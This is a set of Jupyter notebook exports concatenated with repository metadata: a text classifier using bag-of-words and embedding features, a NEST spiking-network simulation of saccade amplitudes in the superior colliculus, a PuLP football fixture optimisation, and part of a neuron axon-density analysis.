    ('tfidf', TfidfTransformer(norm = 'l2')),
    ('clf', LinearSVC()),
])
clf_word_lemm = clf_word_lemm.fit(X_train_lemm , Y_train)
Y_pred = clf_word_lemm.predict(X_test_lemm)
conf = confusion_matrix (Y_test, Y_pred)
auc = accuracy_score(Y_test, Y_pred)
print(metrics.classification_report(Y_test, Y_pred))
# NOTE(review): the next line is an IPython cell magic, not valid plain Python —
# this file only runs inside a notebook with jupyternotify loaded.
% notify -m 'cool'
from sklearn import metrics
print(metrics.classification_report(Y_test, Y_pred))
# ## Embedding derived features
# ### Word2Vec
# +
# Code reference: http://nadbordrozd.github.io/blog/2016/05/20/text-classification-with-word2vec/
# -
# #### Self-trained Word2Vec model
from gensim.models import word2vec
X_total, Y_total = get_X_Y(comments)
# Get a list of all sentences in over comments for word2vec model training
def get_all_sent(data):
all_sent = []
for idx, value in data.iteritems():
all_sent += review_to_sentences(value, tokenizer, remove_stopwords=False)
return all_sent
all_sent = get_all_sent(X_total)
# Train a w2v model using all comments
def train_w2v(sentences, num_features):
model = word2vec.Word2Vec(sentences, sg=1, workers=4, \
size=num_features, min_count = 1, \
window = 10, sample = 1e-3, iter=5)
return model
# Train the model with 300 features
w2v_model = train_w2v(all_sent, 300)
# Get all word vectors from trained model
word_vectors = w2v_model.wv
w2v_model.save('w2v_model')
# Keep stopwords for the embedding features (the model was trained with them).
X_train_w2v = X_train.apply(lambda x: comment_to_wordlist(x,remove_stopwords=False))
X_test_w2v = X_test.apply(lambda x: comment_to_wordlist(x,remove_stopwords=False))
# Word2vec return a 300 dimension vector for each word in the comment, to transfrom a entire comment to a vector
# Averaging word vectors for all words in a text.
class MeanEmbeddingVectorizer(object):
    """Sklearn-style transformer: average the word vectors of each text.

    `word2vec` is any mapping from word to vector (e.g. gensim KeyedVectors).
    Texts whose words are all out-of-vocabulary map to the zero vector.
    """

    def __init__(self, word2vec):
        self.word2vec = word2vec
        # Embedding dimensionality; only used for the all-zero fallback.
        self.dim = 300

    def fit(self, X, y):
        # Stateless transformer — nothing to learn.
        return self

    def transform(self, X):
        rows = []
        for words in X:
            vectors = [self.word2vec[w] for w in words if w in self.word2vec]
            if not vectors:
                vectors = [np.zeros(self.dim)]
            rows.append(np.mean(vectors, axis=0))
        return np.array(rows)
# Mean-embedding features -> linear SVM.
clf_w2v_self = Pipeline([
    ('w2v-embed', MeanEmbeddingVectorizer(word_vectors)),
    ('clf', LinearSVC()),
])
clf_w2v_self = clf_w2v_self.fit(X_train_w2v, Y_train)
Y_pred = clf_w2v_self.predict(X_test_w2v)
auc = accuracy_score(Y_test, Y_pred)
conf = confusion_matrix(Y_test, Y_pred)
print(metrics.classification_report(Y_test, Y_pred))
from collections import Counter, defaultdict
# Similar to the previous MeanEmbeddingVectorizer, but weighting by tf-idf.
class TfidfEmbeddingVectorizer(object):
    """Transformer: tf-idf-weighted average of word vectors per text."""

    def __init__(self, word2vec):
        self.word2vec = word2vec
        self.word2weight = None
        self.dim = 300

    def fit(self, X, y):
        # Fit a tf-idf model over the pre-tokenized texts; the identity
        # analyzer makes TfidfVectorizer treat each list element as a token.
        tfidf = TfidfVectorizer(analyzer=lambda x: x)
        tfidf.fit(X)
        # A word never seen during fitting must be at least as infrequent as
        # any known word, so unknown words default to the maximum known idf.
        max_idf = max(tfidf.idf_)
        self.word2weight = defaultdict(
            lambda: max_idf,
            ((word, tfidf.idf_[i]) for word, i in tfidf.vocabulary_.items()))
        return self

    def transform(self, X):
        rows = []
        for words in X:
            weighted = [self.word2vec[w] * self.word2weight[w]
                        for w in words if w in self.word2vec]
            if not weighted:
                weighted = [np.zeros(self.dim)]
            rows.append(np.mean(weighted, axis=0))
        return np.array(rows)
# Tf-idf-weighted embedding features -> linear SVM.
clf_w2v_self_tfid = Pipeline([
    ('w2v-embed', TfidfEmbeddingVectorizer(word_vectors)),
    ('clf', LinearSVC()),
])
clf_w2v_self_tfid = clf_w2v_self_tfid.fit(X_train_w2v, Y_train)
Y_pred = clf_w2v_self_tfid.predict(X_test_w2v)
auc = accuracy_score(Y_test, Y_pred)
conf = confusion_matrix(Y_test, Y_pred)
print(metrics.classification_report(Y_test, Y_pred))
# ### Doc2Vec
# #### Self-trained Doc2Vec model
from gensim.models.doc2vec import TaggedDocument
from gensim.models import Doc2Vec
from nltk.corpus import stopwords
from nltk.tokenize import word_tokenize, sent_tokenize
from nltk.stem.wordnet import WordNetLemmatizer
X_total, Y_total = get_X_Y(comments)
X_total_d2v = X_total.apply(lambda x: comment_to_wordlist(x, remove_stopwords=True))
# Tagged doc is the required input format for doc2vec training
# Each tagged document has a list of words, and a unique tag for furture vector retrival
def build_taggedDoc(data):
    """Wrap each tokenized comment in `data` as a TaggedDocument.

    Each document gets a unique 'SENT<index>' tag so its trained vector
    can later be retrieved by the same label (see get_vector).
    """
    data_total = []
    # Series.items() replaces Series.iteritems(), which was removed in pandas 2.0.
    for idx, words in data.items():
        doc = TaggedDocument(words, ['SENT' + str(idx)])
        data_total.append(doc)
    return data_total
tagged = build_taggedDoc(X_total_d2v)
def train_d2v(lr, T, data):
    """Train a 300-dim Doc2Vec model for T epochs at fixed learning rate lr.

    alpha == min_alpha pins the learning rate instead of decaying it.
    NOTE(review): `sample=len(data)` is suspicious — `sample` is a word
    down-sampling threshold (typically ~1e-3, as used in train_w2v above),
    not a corpus size; confirm this was intended.
    """
    model = Doc2Vec(vector_size=300, min_count=1, sample=len(data), alpha=lr, min_alpha=lr, epochs=T)
    model.build_vocab(data)
    model.train(data, epochs=model.epochs, total_examples=model.corpus_count)
    return model
d2v_model = train_d2v(0.025, 20, tagged)
def get_vector(d2v_model, doc_data):
    """Look up the trained Doc2Vec vector for every document in a Series.

    Tags must match the 'SENT<index>' labels used by build_taggedDoc when
    the model was trained. Returns a (len(doc_data), vector_size) array.
    """
    # Series.items() replaces Series.iteritems(), which was removed in pandas 2.0.
    # NOTE(review): `docvecs` was renamed `dv` in gensim 4 — confirm version.
    x_data = [d2v_model.docvecs['SENT' + str(idx)] for idx, _words in doc_data.items()]
    return np.array(x_data)
# Build doc2vec feature matrices for train/test and fit a linear SVM on them.
X_train_d2v, Y_train = get_X_Y(train_comments)
X_test_d2v, Y_test = get_X_Y(test_comments)
X_train_d2v = X_train_d2v.apply(lambda x: comment_to_wordlist(x, remove_stopwords=True))
X_test_d2v = X_test_d2v.apply(lambda x: comment_to_wordlist(x, remove_stopwords=True))
X_train_d2v_v = get_vector(d2v_model, X_train_d2v)
X_test_d2v_v = get_vector(d2v_model, X_test_d2v)
clf_d2v = LinearSVC()
clf_d2v.fit(X_train_d2v_v, Y_train)
Y_pred =clf_d2v.predict(X_test_d2v_v)
auc = accuracy_score(Y_test, Y_pred)
conf = confusion_matrix(Y_test, Y_pred)
print(metrics.classification_report(Y_test, Y_pred))
# ## Syntactic features
# ### Text and part-of-speech(POS) tagging
# Instead word as feature, and its POS tag as addition feature
# Eg: 'I like cat' -> 'i i_NNS like like_VBP cat cat_NN'
def get_pos_feature(data, tokenizer, remove_stopwords=False):
sentences = review_to_sentences(data, tokenizer, remove_stopwords)
feature_str = ''
for sent in sentences:
tag = pos_tag(sent)
for tuple_pair in tag:
feature_str += tuple_pair[0] + ' '
feature_str += tuple_pair[0] + '_' + tuple_pair[1] + ' '
return feature_str
# POS-augmented features -> word 1-2-gram tf-idf -> linear SVM.
X_train_pos = X_train.apply(lambda x: get_pos_feature(x, tokenizer))
X_test_pos = X_test.apply(lambda x: get_pos_feature(x, tokenizer))
clf_pos_tag = Pipeline([
    ('vect', CountVectorizer(analyzer='word', max_features = 10000, ngram_range = (1,2))),
    ('tfidf', TfidfTransformer(norm = 'l2')),
    ('clf', LinearSVC()),
])
clf_pos_tag =clf_pos_tag.fit(X_train_pos, Y_train)
Y_pred = clf_pos_tag.predict(X_test_pos)
auc = accuracy_score(Y_test, Y_pred)
conf = confusion_matrix (Y_test, Y_pred)
print(metrics.classification_report(Y_test, Y_pred))
# Treebank tags to keep: nouns, adjectives, verbs, and personal pronouns.
# NOTE(review): the name 'sets' shadows nothing built-in but is uninformative.
sets = set(['NN','JJ','JJR','JJS','VB','VBD','VBG','VBN','VBP','VBZ','PRP'])
# Only consider Noun, Verb, Adjective, Pronoun
def get_pos_feature_wo(data, tokenizer, remove_stopwords=False):
    """POS features keeping only noun/verb/adjective/pronoun tokens.

    Verb tenses collapse to a single '_V' suffix (took/take both tag as V)
    and adjective degrees collapse to '_J' (clean/cleaner/cleanest all J);
    remaining whitelisted tags keep their full Treebank suffix.
    """
    pieces = []
    for sent in review_to_sentences(data, tokenizer, remove_stopwords):
        for word, pos in pos_tag(sent):
            if pos not in sets:
                continue
            if 'V' in pos:
                pieces.append(word + '_V')
            elif 'J' in pos:
                pieces.append(word + '_J')
            else:
                pieces.append(word + '_' + pos)
    return ''.join(piece + ' ' for piece in pieces)
# Filtered POS features -> word 1-2-gram tf-idf -> linear SVM.
X_train_pos_wo = X_train.apply(lambda x: get_pos_feature_wo(x, tokenizer))
X_test_pos_wo = X_test.apply(lambda x: get_pos_feature_wo(x, tokenizer))
clf_pos_tag_wo = Pipeline([
    ('vect', CountVectorizer(analyzer='word', max_features = 10000, ngram_range = (1,2))),
    ('tfidf', TfidfTransformer(norm = 'l2')),
    ('clf', LinearSVC()),
])
clf_pos_tag_wo =clf_pos_tag_wo.fit(X_train_pos_wo , Y_train)
Y_pred = clf_pos_tag_wo.predict(X_test_pos_wo)
auc = accuracy_score(Y_test, Y_pred)
conf = confusion_matrix (Y_test, Y_pred)
print(metrics.classification_report(Y_test, Y_pred))
# ## Combine BOW with Word2Vec
clf_vectorize = Pipeline([
    ('vect', CountVectorizer(analyzer='word', max_features = 10000, ngram_range = (1,2))),
    ('tfidf', TfidfTransformer(norm = 'l2')),
])
# NOTE(review): fit_transform is called separately on train AND test below,
# which fits two different vocabularies — train and test feature columns will
# not be aligned. The test set should use clf_vectorize.transform(...) with
# the vectorizer fitted on the training data only.
x_train_b = clf_vectorize.fit_transform(X_train_clean).todense()
x_test_b = clf_vectorize.fit_transform(X_test_clean).todense()
x_train_em = MeanEmbeddingVectorizer(word_vectors).transform(X_train_clean)
x_test_em = MeanEmbeddingVectorizer(word_vectors).transform(X_test_clean)
# Convert the dense matrices' rows to flat 1-D arrays before concatenation.
x_train_br = np.apply_along_axis(lambda x: np.squeeze(np.asarray(x)), 1, x_train_b)
x_test_br = np.apply_along_axis(lambda x: np.squeeze(np.asarray(x)), 1, x_test_b)
# Column-stack BOW features with embedding features.
x_train_be = np.c_[x_train_br, x_train_em]
x_test_be = np.c_[x_test_br, x_test_em]
clf_svc = LinearSVC()
clf_svc.fit(x_train_be, Y_train)
Y_pred = clf_svc.predict(x_test_be)
auc = accuracy_score(Y_test, Y_pred)
conf = confusion_matrix (Y_test, Y_pred)
print(metrics.classification_report(Y_test, Y_pred))
| 19,694 |
/Scripts/.ipynb_checkpoints/saccade_amplitude-checkpoint.ipynb
|
1f41097de177ce5adbbd00878ce95813e7ce8247
|
[] |
no_license
|
imcomba/SuperiorColliculus
|
https://github.com/imcomba/SuperiorColliculus
| 1 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 168,036 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 2
# language: python
# name: python2
# ---
# # Trenes y densidades de spikes para diferentes amplitudes del sacádico.
# %matplotlib notebook
import matplotlib.pyplot as plt
import numpy
import nest
# Load the custom superior-colliculus NEST module and set the 0.01 ms resolution.
nest.Install('scmodule')
nest.SetKernelStatus({"resolution": 0.01})
num_neurons = 200
num_deg = 7
sigma = 8.0  # ms, width of the Gaussian kernel
min_tau = 10.0  # ms, minimum adaptation time constant
max_tau = 80.0  # ms, maximum adaptation time constant
wexc_factor = 0.160  # nS, excitatory weight factor
winh_factor = 0.05  # nS, inhibitory weight factor
syn_exc = 0.4  # mm, excitatory synapse range
syn_inh = 1.2  # mm, inhibitory synapse range
max_pos = 5.0  # mm, maximum anatomical position
min_pos = 0.0  # mm, minimum anatomical position
# Logarithmic mapping function (saccade amplitude -> collicular position)
Bu = 1.4  # mm
A = 3  # deg
min_sacc_amp = 3
max_sacc_amp = 51
simulation_len = 300.0
# Python 2 script (print statements below).
position = numpy.linspace(min_pos, max_pos, num_neurons)
r = numpy.linspace(min_sacc_amp, max_sacc_amp, num_deg)  # saccade amplitudes (deg)
ut = Bu*numpy.log((r+A)/A)  # saccade site position as a function of amplitude (log mapping)
distance = numpy.zeros((len(position),len(ut)))
# Matrix of distances between each saccade's central site and each neuron's position.
# (Could be vectorized as numpy.abs(position[:, None] - ut[None, :]).)
for idx_p, pos in enumerate(position):
    for idx_s, site in enumerate(ut):
        distance[idx_p, idx_s] = numpy.absolute(pos-site)
id_min_dis = numpy.argmin(distance, axis=0)  # central (closest) neuron per saccade
print id_min_dis
print r
# Create the layers, each of 200 neurons. Start with the first saccade
# amplitude so the generator population's `distance` parameter is defined.
sacc_3 = distance[:,0]
GEN_list = []
# One input generator per neuron, parameterised by its distance to the saccade site.
for dist_3 in sacc_3:
    GEN_list.append({"i0":3.0, "beta":0.03, "gamma":1.8, "pop":0.5, "sc_onset":0.0, "distance":dist_3})
GEN_pop = nest.Create("sc_generator", num_neurons, params=GEN_list)
# FEF relay neurons: adaptive-exponential integrate-and-fire, identical parameters.
FEF_dict = {"C_m":50.0,"t_ref":0.0,"V_reset":-55.0,"E_L":-70.0, "g_L":2.0, "I_e":0.0, "a":0.0, "b":60.0,
            "Delta_T":2.0, "tau_w":30.0, "V_th":-50.0, "V_peak":-30.0}
FEF_pop = nest.Create("aeif_cond_exp", num_neurons, params=FEF_dict)
# SC neurons: adaptation time constant varies linearly from max_tau to min_tau
# across the population.
tau_net = numpy.linspace(max_tau, min_tau, num_neurons)
SC_list = []
for tau_w in tau_net:
    SC_list.append({"C_m":280.0,"t_ref":0.0, "V_reset":-45.0, "E_L":-70.0, "g_L":10.0,"I_e":0.0, "a":4.0,
                    "b":80.0, "Delta_T":2.0,"V_th":-50.0, "V_peak":-30.0,"E_ex":0.0, "tau_syn_ex":5.0,
                    "E_in":-80.0, "tau_syn_in":10.0, "tau_w":tau_w})
SC_pop = nest.Create("aeif_cond_exp",num_neurons, params=SC_list)
# Añado las conexiones laterales dentro de la población SC.
# +
# Lateral intracollicular connections within the SC population: Gaussian
# short-range excitation plus Gaussian longer-range inhibition in
# anatomical distance.
# (Cleanup: removed two dead assignments -- `wexc = numpy.zeros(...)` was
# overwritten before use and `wind = numpy.zeros(...)` was never used.)
position = numpy.linspace(min_pos, max_pos, num_neurons)
# Row/column (pre, post) index pairs for the flattened weight matrices.
sc_filas = numpy.repeat(range(num_neurons), num_neurons)
sc_colum = numpy.tile(range(num_neurons), num_neurons)
wexc = wexc_factor*numpy.exp(-(numpy.square(position[sc_filas]-position[sc_colum]))
                             /(2*numpy.square(syn_exc)))
wexc = wexc.reshape((num_neurons,num_neurons))
numpy.fill_diagonal(wexc,0)  # no self-excitation
ind_filas = numpy.repeat(range(num_neurons), num_neurons)
ind_colum = numpy.tile(range(num_neurons), num_neurons)
winh = winh_factor*numpy.exp(-(numpy.square(position[ind_filas]-position[ind_colum]))
                             /(2*numpy.square(syn_inh)))
winh = winh.reshape((num_neurons,num_neurons))
numpy.fill_diagonal(winh,0)  # no self-inhibition
# All-to-all connectivity; the diagonal weights are already zero above.
conn_dict = {'rule':'all_to_all', 'autapses': True}
syn_dict_exc = {'weight': wexc, 'delay':1.0}
nest.Connect(SC_pop, SC_pop, conn_spec = conn_dict, syn_spec = syn_dict_exc)
syn_dict_inh = {'weight': -winh, 'delay':1.0}
nest.Connect(SC_pop, SC_pop, conn_spec = conn_dict, syn_spec = syn_dict_inh)
# -
# Utilizo el polinomio de segundo grado para calcular los pesos de la sinápsis.
def funcion_polinomio(tau_net):
    """Map an adaptation time constant (ms) to a synaptic weight.

    Second-degree polynomial fit: w = c2*tau^2 + c1*tau + c0.
    """
    c2, c1, c0 = -0.001803, 0.2925, 3.432
    quadratic_term = c2 * tau_net * tau_net
    linear_term = c1 * tau_net
    return quadratic_term + linear_term + c0
# FEF -> SC weights from the quadratic fit on the adaptation time constant.
wei_net = funcion_polinomio(tau_net)
nest.Connect(GEN_pop, FEF_pop, "one_to_one", syn_spec={'weight':1.0, 'delay':1.0})
syn_dict = {'weight': wei_net, 'delay':1.0}
nest.Connect(FEF_pop, SC_pop, "one_to_one", syn_spec=syn_dict)
# Record every SC spike (sender id + time) for later density estimation.
spikedetector = nest.Create("spike_detector", params={"withgid":True, "withtime":True})
nest.Connect(SC_pop, spikedetector, syn_spec={'delay':1.0})
# Define the dictionaries with the distances for each possible saccade
# amplitude, and run one 'simulation_len'-ms simulation per amplitude.
for idx_sacc in range(0, len(r)):
    dicts = [{'distance':value,"sc_onset":idx_sacc*simulation_len} for value in distance[:,idx_sacc]]
    nest.SetStatus(GEN_pop, dicts)
    nest.Simulate(simulation_len)
# Gaussian-kernel spike-density computation.
dSD = nest.GetStatus(spikedetector)[0]
evs = dSD["events"]["senders"]   # sender neuron ids
tspk = dSD["events"]["times"]    # spike times (ms)
def gaussian_funct(time_diff, sigma):
    """Zero-mean Gaussian density of width ``sigma`` evaluated at ``time_diff``.

    Works element-wise for scalars or numpy arrays.
    """
    norm_const = 1 / (sigma * numpy.sqrt(2 * numpy.pi))
    exponent = -(time_diff * time_diff) / (2 * (sigma * sigma))
    return norm_const * numpy.exp(exponent)
# +
# Spike-density function of the central neuron for each saccade amplitude:
# spikes are aligned to the first spike and convolved with a Gaussian kernel.
t = numpy.arange(-30.0, 80.0, 0.1)
gauss = numpy.zeros((len(r),t.shape[0]))
for id_sacc in range(0, len(r)):
    # Time window of this amplitude's simulation run.
    tini = id_sacc*simulation_len
    tend = tini+simulation_len
    sel_spk = numpy.logical_and(tspk>tini, tspk<tend)
    # Central neuron = the one closest to this saccade's map site.
    idx_central = id_min_dis[id_sacc]
    neu_central = SC_pop[idx_central]
    spk_central = numpy.logical_and(evs==neu_central, sel_spk)
    first_spk = numpy.min(tspk[spk_central])
    for spike in tspk[spk_central]:
        time_diff = t-(spike-first_spk)
        gauss[id_sacc,:] = gauss[id_sacc,:]+(gaussian_funct(time_diff, sigma))
gauss = gauss*1e3   # kernel is per-ms; scale to spikes per second
# -
plt.figure()
plt.plot(t, gauss.T)
plt.xlabel('Time (ms)')
plt.ylabel('Spike density (spk/s)')
plt.legend([' 3 deg','11 deg', '19 deg', '27 deg', '35 deg', '43 deg', '51 deg'])
# Fig.15. Spike-density function of the central neuron for different saccade amplitudes.
plt.figure()
plt.plot(tspk,evs,".")
plt.ylabel('Number of neurons')
plt.xlabel('Time(ms)')
# Fig.16. Spike trains as a function of saccade amplitude.
# Number of spikes in the central neuron.
| 6,416 |
/clustering_stud.ipynb
|
6b4dbc6c8ec3891c2f51caa1d052a0d1b2520feb
|
[] |
no_license
|
krzysztofnowakuz/DS_postgraduate
|
https://github.com/krzysztofnowakuz/DS_postgraduate
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 1,146,383 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# + [markdown] id="view-in-github" colab_type="text"
# <a href="https://colab.research.google.com/github/GLuarte/TareasX/blob/master/Fixture_Futbol_(TareaSofi).ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# + id="RyjDORS8xPSN" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 87} outputId="00b2aa43-03cf-41ae-c0ba-89c321aaa424"
# !pip install pulp
# + id="bJ1zCjujxJHG" colab_type="code" colab={}
from pulp import *
import numpy as np
# + id="fQNLramZxTFV" colab_type="code" colab={}
# Problem dimensions: a = max home games per team,
# m = number of "big" teams, n = number of "small" teams.
a=4
m=3
n=5
# (Commented-out generic 'Equipo N' name generation removed; real team
# names are used below.)
# Round labels: a single round-robin of m+n teams needs m+n-1 rounds.
fechas=[]
for i in range (1,m+n):
    eq='Fecha '+str(i)
    fechas.append(eq)
# + id="_W7PhkXAZXF6" colab_type="code" colab={}
equipos_m=['Colo Colo','U de Chile','U Catolica']
equipos_n=['Dep Iquique','Cobresal',"O'Higgins",'Huachipato','UdeC']
equipos=equipos_m+equipos_n
# + id="zV9EjRltXnYw" colab_type="code" colab={}
# Result tensor: (round, home team, away team) filled in after solving.
torneo=np.zeros((len(fechas),len(equipos),len(equipos)))
# + id="JQuA_CONyEBP" colab_type="code" colab={}
# Binary decision variable x[i,j,k] = 1 iff team i hosts team j in round k.
x=LpVariable.dicts('Partido',
                   [(i,j,k) for i in equipos for j in equipos for k in fechas],
                   lowBound=0,
                   upBound=1,
                   cat='Integer'
                  )
# + id="JdlOCiIt0Kth" colab_type="code" colab={}
z=LpProblem('FixtureFutbol',LpMaximize)
# + id="3hr4aSPGRz0u" colab_type="code" colab={}
# Objective: maximise the total number of scheduled matches.
z+=lpSum((x[(i,j,k)])for k in fechas for i in equipos for j in equipos)
# + id="d44pTaRuB19_" colab_type="code" colab={}
# A team cannot play against itself.
for i in equipos:
    for k in fechas:
        z+=x[(i,i,k)]==0
# + id="cEsgz-zIJjYC" colab_type="code" colab={}
# Each pair of teams meets at most once (home or away); together with the
# maximising objective this yields a full round-robin.
for i in equipos:
    for j in equipos:
        z+=lpSum((x[(i,j,k)]+x[(j,i,k)])for k in fechas)<=1
# + id="IiRQEWz9CXrt" colab_type="code" colab={}
# Each team plays exactly one match per round.
for j in equipos:
    for k in fechas:
        z+=lpSum((x[(i,j,k)]+x[(j,i,k)]) for i in equipos)==1
# + id="XlKovKLkNpG_" colab_type="code" colab={}
# At most 'a' home matches per team.
for i in equipos:
    z+=lpSum((x[(i,j,k)])for k in fechas for j in equipos )<=a
# + id="n7NHgLFJU__5" colab_type="code" colab={}
# "Clasicos" (big-team derbies) are kept out of the first three rounds
# so they land in the later rounds.
z+=lpSum((x[(i,j,k)]+x[(j,i,k)])for i in equipos_m for j in equipos_m for k in fechas[:3])==0
# + id="VuIw5wo3QRQ3" colab_type="code" colab={}
# Small teams must host a big team at least once.
# NOTE(review): this is a single aggregate constraint over ALL small teams,
# not one constraint per team -- confirm that matches the intent.
z+=lpSum((x[(i,j,k)])for i in equipos_n for j in equipos_m for k in fechas)>=1
# + id="Tue-qEf_SEoV" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 52} outputId="7474cb08-c2e3-4bb5-df88-d1696fd7d345"
z.writeLP('tareaSofi.lp')
z.solve()
print('status:', LpStatus[z.status])
#for v in z.variables():
#  print(v.name, v.varValue)
print ('FO:',value(z.objective))
# + id="A53LQKpwYKB-" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 745} outputId="eefce4a5-517b-4f4d-b8f6-21c342d5f7e2"
# Print the resulting fixture round by round.
# NOTE(review): these loop variables shadow the n/m constants defined above.
for n,k in enumerate(fechas):
    for m,j in enumerate(equipos):
        for l,i in enumerate(equipos):
            torneo[n,l,m]=float(x[(i,j,k)].varValue)
            if torneo[n,l,m]==1:
                print(k,i,'vs',j)
    print('\n')
ca)['region']
ca = ca[ca.region.isin(tid)]
cc, outlier_ratio = get_center(ca, False)
# cc = ca.loc[cc]
# cc
# +
# Build the per-neuron axon table: for every neuron in nlist, keep only its
# axonal nodes that fall inside the target region (tid), and record the
# axon's center position and total length.
axon_dict = {}
nlist_selected = []
axon_df = pd.DataFrame(index=nlist, columns=['x', 'y', 'z', 'length'])
for i in nlist:
# for i in ['17545_00054']:
    cswc = ns.neurons[i].swc.copy()
    cswc = cswc[cswc.type==2]          # SWC type 2 = axon (SWC convention)
    cswc['region'] = get_node_regions(cswc)['region']
    cswc = cswc[cswc.region.isin(tid)]
    # Drop nodes whose parent was filtered out, keeping the tree consistent.
    cswc = cswc[cswc.parent.isin(cswc.index)]
    if len(cswc)>0:
        cc, outlier_ratio = get_center(cswc, True)
        cc = cswc.loc[cc]
        cl = total_length(cswc)/1000   # /1000: presumably um -> mm; confirm
        if cl < 1:
            # Axons shorter than 1 mm in the target are reported and excluded.
            print('%s:\t%.2fmm' % (i, cl))
        else:
            nlist_selected.append(i)
            axon_dict.update({i:cswc})
            axon_df.loc[i, ['x', 'y', 'z', 'length']] = cc[['x', 'y', 'z']].tolist()+[cl]
print(len(nlist), len(nlist_selected))
# ## distance soma v.s. axon
# %matplotlib inline
# +
# Pairwise soma-soma vs. axon-center distances across the selected neurons,
# with a linear regression relating the two.
iu = np.triu_indices(len(nlist_selected), k=1)   # unique unordered pairs
soma_dist = sklearn.metrics.pairwise_distances(soma_df.loc[nlist_selected, ['x', 'y', 'z']])[iu].reshape(-1,1)
axon_dist = sklearn.metrics.pairwise_distances(axon_df.loc[nlist_selected, ['x', 'y', 'z']])[iu].reshape(-1,1)
# /1000 converts the plotted distances (presumably um -> mm); the regression
# below still runs on the raw values.
df = pd.DataFrame({'Soma_distance (mm)':soma_dist[:,0],
                   'Axon_distance (mm)':axon_dist[:,0],
                  })/1000
lm = sklearn.linear_model.LinearRegression()
lm.fit(soma_dist, axon_dist)
r2 = lm.score(soma_dist, axon_dist)
c1 = lm.coef_
c2 = lm.intercept_
r = np.corrcoef(soma_dist[:,0], axon_dist[:,0])[0,1]
fig, ax = plt.subplots(1,1, figsize=(3,3))
ax.tick_params(length=4, width=1, color='k')
for axis in ['top','bottom','left','right']:
    ax.spines[axis].set_linewidth(0.5)
g = sns.regplot("Soma_distance (mm)", "Axon_distance (mm)",
                data=df,
                x_bins=10,
                order=1,
                truncate=True,
                ax=ax,
                color='darkorange',
                line_kws={'lw':0.5},
                scatter_kws={'s':15},
                x_jitter=.1)
# Annotate fit statistics in the upper-left corner of the axes.
xlim = ax.get_xlim()
xr = (xlim[1]-xlim[0])
ylim = ax.get_ylim()
yr = (ylim[1]-ylim[0])
txlim = xlim[0] + xr*0.05
ax.set_xlim((0,1.2))
ax.text(txlim, ylim[0] + yr*0.95, "R^2 = %.2f" % (r2), fontdict={'ha':'left', 'va':'top'})
ax.text(txlim, ylim[0] + yr*0.87, "R = %.2f" % (r), fontdict={'ha':'left', 'va':'top'})
ax.text(txlim, ylim[0] + yr*0.79, "y = %.2fx + %.2f" % (c1, c2), fontdict={'ha':'left', 'va':'top'})
# NOTE(review): the pickle file handle is never closed; prefer a with-block.
fig.savefig("../Figure/soma_axon_regression_"+group+"_v2.pdf", bbox_inches='tight')
pickle.dump([df], open("Soma_axon_distance_"+group+"_v2.pickle", 'wb'))
# -
# ## Axon overlaps
# +
# Get the target-region subvolume, padded by 500 and clipped to the atlas
# bounds; *25.0 is the annotation voxel size (presumably um -- confirm).
region_id = nmt.bs.name_to_id(target)
tp = nmt.mergeROI([region_id], nmt.annotation.array)
tp[:,:,int(midline/25):] = 0   # zero the hemisphere beyond the midline
tp = np.where(tp==region_id)
xlim = (np.max([np.min(tp[0])*25.0 - 500, 0]),
        np.min([np.max(tp[0])*25.0 + 500, x_max]))
ylim = (np.max([np.min(tp[1])*25.0 - 500, 0]),
        np.min([np.max(tp[1])*25.0 + 500, y_max]))
zlim = (np.max([np.min(tp[2])*25.0 - 500, 0]),
        np.min([np.max(tp[2])*25.0 + 500, z_max]))
print(xlim, ylim, zlim)
# Grid resolution for the density maps below.
step_size = 75
x_steps = int((xlim[1]-xlim[0])/step_size)
y_steps = int((ylim[1]-ylim[0])/step_size)
z_steps = int((zlim[1]-zlim[0])/step_size)
print("x steps:\t%d\ny steps:\t%d\nz steps:\t%d" % (x_steps, y_steps, z_steps))
def density_estimation(cur_name, x_steps=20, y_steps=20, plot=True):
    """Estimate a normalized 2D (x, y) axon density map for one neuron.

    Fits a Gaussian KDE (bandwidth 50) to the neuron's axon nodes and
    evaluates it on an x_steps-by-y_steps grid spanning the module-level
    xlim/ylim subvolume bounds.

    Parameters
    ----------
    cur_name : key into the module-level ``axon_dict``.
    x_steps, y_steps : grid resolution.
    plot : if True, also show the map with imshow.

    Returns
    -------
    np.ndarray of shape (x_steps, y_steps), normalized to sum to 1.
    """
    # Bug fix: axon_dict stores the filtered node DataFrame itself (see the
    # cell that builds it), so the previous `.swc` attribute access would
    # fail; also removed a dead `p = p` statement.
    nodes = axon_dict[cur_name].copy()
    kde = sklearn.neighbors.KernelDensity(bandwidth=50)
    kde.fit(nodes[['x', 'y']])
    xs = np.linspace(xlim[0], xlim[1], num=x_steps)
    ys = np.linspace(ylim[0], ylim[1], num=y_steps)
    # Score the whole grid in one vectorized call instead of one kde.score()
    # call per cell; row order (x outer, y inner) matches the C-order reshape.
    grid = np.array([[xg, yg] for xg in xs for yg in ys])
    p = np.exp(kde.score_samples(grid)).reshape(x_steps, y_steps)
    p = p / np.sum(p)
    if plot:
        fig, ax = plt.subplots(1, 1, figsize=(7, 7))
        ax.imshow(p)
    return p
def density_estimation_3d(cur_name, x_steps=20, y_steps=20, z_steps=20, plot=True):
z = axon_dict[cur_name].copy()
kde = sklearn.neighbors.KernelDensity(bandwidth=50)
kde.fit(z[['x', 'y', 'z']])
p = np.zeros((x_steps, y_steps, z_steps))
tp = np.where(p==0)
tp = np.hstack([tp[0].reshape(-1,1),
tp[1].reshape(-1,1),
tp[2].reshape(-1,1)
])*step_size+np.array([xlim[0], ylim[0], zlim[0]]).reshape(1,-1)
p = np.exp(kde.score_samples(tp)).reshape(x_steps, y_steps, z_steps, order="C"
| 8,191 |
/examples/model_hosting/notebook/training/LocalTraining.ipynb
|
75f1b0e18318691eb28555bee25add84ac7c9294
|
[
"Apache-2.0"
] |
permissive
|
tibnor/cognite-python-docs
|
